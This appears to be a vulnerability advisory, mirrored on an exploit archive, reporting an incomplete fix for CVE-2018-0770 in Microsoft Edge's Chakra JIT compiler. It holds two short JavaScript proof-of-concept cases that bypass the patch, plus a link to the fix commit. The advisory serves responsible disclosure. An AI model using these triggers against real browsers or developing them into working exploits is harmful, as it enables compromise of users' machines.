Microsoft Edge Chakra JIT Incomplete Fix

Microsoft Edge Chakra JIT suffers from a bypass vulnerability.


MD5 | a1bcc09777f48b460ea48c8fe2b4e014

Microsoft Edge: Chakra: JIT: Incomplete fix for issue 1365

CVE-2018-0770


It seems this is the patch for the bug.
<a href="https://github.com/Microsoft/ChakraCore/pull/4226/commits/874551dd00ff6f404e593c7e0162efb54b953f5a" title="" class="" rel="nofollow">https://github.com/Microsoft/ChakraCore/pull/4226/commits/874551dd00ff6f404e593c7e0162efb54b953f5a</a>

The following two cases will bypass the fix.

1:
function opt() {
let obj = new Number(2.3023e-320);
for (let i = 0; i < 1; i++) {
obj.x = 1;
obj = +obj;
obj.x = 1;
}
}

function main() {
for (let i = 0; i < 100; i++) {
opt();
}
}

main();

2:
function opt() {
let obj = '2.3023e-320';
for (let i = 0; i < 1; i++) {
obj.x = 1;
obj = +obj;
obj.x = 1;
}
}

function main() {
for (let i = 0; i < 100; i++) {
opt();
}
}

main();


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt


Related Posts